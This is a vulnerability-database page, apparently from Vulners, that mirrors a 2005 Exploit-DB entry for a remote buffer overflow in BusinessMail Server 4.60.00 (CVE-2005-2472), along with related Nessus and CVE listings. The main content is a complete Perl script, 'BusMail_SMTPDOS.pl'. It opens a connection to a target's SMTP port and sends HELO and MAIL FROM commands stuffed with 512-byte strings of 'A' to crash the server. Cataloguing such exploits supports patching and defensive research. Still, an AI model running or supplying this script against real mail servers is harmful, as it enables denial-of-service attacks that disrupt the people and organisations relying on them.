Lucene search
+L

BusinessMail Server 4.60.00 - Remote Buffer Overflow

🗓️ 30 Jul 2005 00:00:00Reported by Reed ArvinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 54 Views

BusinessMail Server 4.60.00 remote buffer overflow attac

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
BusinessMail SMTP < 4.7 Multiple Command Remote Overflows
2 Aug 200500:00
nessus
Tenable Nessus
BusinessMail Multiple SMTP Command Remote Buffer Overflows
2 Aug 200500:00
nessus
CVE
CVE-2005-2472
5 Aug 200504:00
cve
Cvelist
CVE-2005-2472
5 Aug 200504:00
cvelist
Exploit DB
BusinessMail Server 4.60.00 - Remote Denial of Service
1 Aug 200500:00
exploitdb
NVD
CVE-2005-2472
5 Aug 200504:00
nvd
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
#        BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";

        sleep(1);

        print $socket "HELO " . "A" x 512 . "\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== Start BusMail_SMTPDOS.pl =====

# milw0rm.com [2005-07-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.04583
54